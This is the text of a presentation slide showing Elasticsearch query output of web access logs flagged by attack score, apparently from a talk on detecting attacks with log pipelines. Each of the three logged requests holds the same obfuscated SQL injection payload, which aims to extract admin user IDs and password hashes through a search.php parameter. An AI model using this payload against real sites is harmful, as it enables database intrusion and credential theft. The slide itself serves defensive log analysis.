Slide 39
Slide 39 text
Pipeline Queries
https://github.com/reyjrar/es-utils
= Querying Indexes: lhr4-access-2015.06.03,ams4-access-2015.06.03
@timestamp attack_score src_ip crit dst method resource
2015-06-03T04:20:59+0200 340 107.150.42.90 404 www.booking.com GET /plus/
search.php?keyword=as&typeArr[111%3D@`%5C'`)+/*!50000And*/+(/*!50000SeLECT*/+1+/*!50000frOM*/+(/*!
50000SeLECT*/+/*!50000Count(*)*/,concat(floor(rand(0)*2),(substring((/*!50000SeLECT*/
+CONCAT(0x40,userid,0x7c,substring(pwd,4,16))+from+`%23@__admin`+limit+0,1),1,62)))a+/*!
50000fRom*/+information_schema.tables+/*!50000gROUP*/+by+a)b)%23@`%5C'`+]=a
2015-06-03T00:50:43+0200 340 107.150.42.90 404 www.booking.com GET /plus/
search.php?keyword=as&typeArr[111%3D@`%5C'`)+/*!50000And*/+(/*!50000SeLECT*/+1+/*!50000frOM*/+(/*!
50000SeLECT*/+/*!50000Count(*)*/,concat(floor(rand(0)*2),(substring((/*!50000SeLECT*/
+CONCAT(0x40,userid,0x7c,substring(pwd,4,16))+from+`%23@__admin`+limit+0,1),1,62)))a+/*!
50000fRom*/+information_schema.tables+/*!50000gROUP*/+by+a)b)%23@`%5C'`+]=a
2015-06-03T05:18:19+0200 340 107.150.42.90 404 www.booking.com GET /plus/
search.php?keyword=as&typeArr[111%3D@`%5C'`)+/*!50000And*/+(/*!50000SeLECT*/+1+/*!50000frOM*/+(/*!
50000SeLECT*/+/*!50000Count(*)*/,concat(floor(rand(0)*2),(substring((/*!50000SeLECT*/
+CONCAT(0x40,userid,0x7c,substring(pwd,4,16))+from+`%23@__admin`+limit+0,1),1,62)))a+/*!
50000fRom*/+information_schema.tables+/*!50000gROUP*/+by+a)b)%23@`%5C'`+]=a
# Search Parameters:
# {"terms":{"src_ip":["107.150.42.90","37.59.7.157","74.84.138.120"]}}
# {"query_string":{"query":"dst:www.booking.com"}}
# Displaying 3 of 793 in 0 seconds.
# Indexes (2 of 2) searched: ams4-access-2015.06.03,lhr4-access-2015.06.03